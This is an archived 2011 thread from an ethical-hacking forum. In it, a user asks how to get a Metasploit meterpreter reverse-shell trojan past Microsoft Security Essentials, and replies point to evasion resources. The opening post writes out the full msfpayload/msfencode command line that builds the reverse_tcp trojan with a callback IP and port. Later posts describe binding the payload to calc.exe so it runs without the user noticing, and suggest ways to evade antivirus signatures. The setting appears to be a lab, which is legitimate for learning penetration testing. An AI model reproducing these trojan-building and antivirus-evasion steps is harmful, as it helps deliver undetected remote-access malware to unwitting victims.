The Ethical Hacker Network

acidicloop

Newbie

Offline

Posts: 7

msfencode

« on: November 29, 2011, 12:39:35 AM »

Hello again. Ive been making some trojans with msfpayload and have been messing with msfencode. The trojan has worked great dropping the meterpreter shell, however, for the life of me I cannot get it past microsoft security essential antivirus. No matter what I do, it flags it. My code is this:
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.146.139 lport=4442 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > chucknorris.exe and I usually run an apache server and connect to it from the xp machine and download the trojan, or I do shared folders in VM. Any tricks yall know to bypass security essentials? I would think two counts of 10 a piece and shikata_ga_nai would do the trick, but alas it does not.


	Logged

j0rDy

Hero Member

Offline

Posts: 590

Re: msfencode

« Reply #1 on: November 29, 2011, 06:59:31 AM »

pff, this is not easy, i'd say you have two options. now please correct me if i'm wrong, i have no experience with this whatsoever!

first thing you could to to evade antivirus is make sure the code is different so it will not match the signature of the antivirus. You can do this by adding characters that may not be used. you can use the following parameter for this: -b The list of characters to avoid: 'x00xff'

another option would be to obfuscate the code or to attach the code to another executable, but i dont have any examples on that.

you probably already seen this one? http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass


	Logged

ISC2 Associate, CEH, ECSA, OSCP, OSWP

earning my stripes appears to be a road i must travel alone...with a little help of EH.net

3xban

Hero Member

Offline

Posts: 608

Re: msfencode

« Reply #2 on: November 29, 2011, 07:25:29 AM »

I've noticed that MSE is pretty darn good at catching these customized trojans. I had it catch the PDF exploit for cool type almost instantly. I've had it also pick up traffic from an exploited website before other AV products did (SEP, ESET, AVG). I have no idea why people would be upset with a company who designed an OS to use their own built in AV. One would think who would know their system better than the creator of that system.

You may have to get creative with bypassing MSE.


	Logged

Certs: GCWN
(@)Dewser

chrisg

Guest

Re: msfencode

« Reply #3 on: November 29, 2011, 08:13:49 AM »

here are a couple of links that may help

http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/

http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/

this thread from msf mailing list
http://mail.metasploit.com/pipermail/framework/2011-April/007630.html


	Logged

cd1zz

Hero Member

Offline

Posts: 561

Re: msfencode

« Reply #4 on: November 29, 2011, 09:01:24 AM »

Another resource http://schierlm.users.sourceforge.net/avevasion.html


	Logged

OSCE | OSCP | GXPN | OSWP | CISSP
http://www.pwnag3.com
http://www.networkadminsecrets.com

acidicloop

Newbie

Offline

Posts: 7

Re: msfencode

« Reply #5 on: November 29, 2011, 09:57:48 AM »

Thanks for the links. Glad to know, its not just my issue, lol. Now I thought shikata_ga_nai was polymorphic? curious why that wouldnt evade SE, unless like the article said, SE bases it off templates. I even did a trick where I uploaded the trojan, ran iexpress and made a self extracting executable by attaching it to calculator, so that when they closed out calc after use, it ran the meterpreter reverse_tcp. But it flagged that too and under the properties of the trojaned calc its even signed by microsoft,lol


	Logged

Pages: [1] Go Up

« previous next »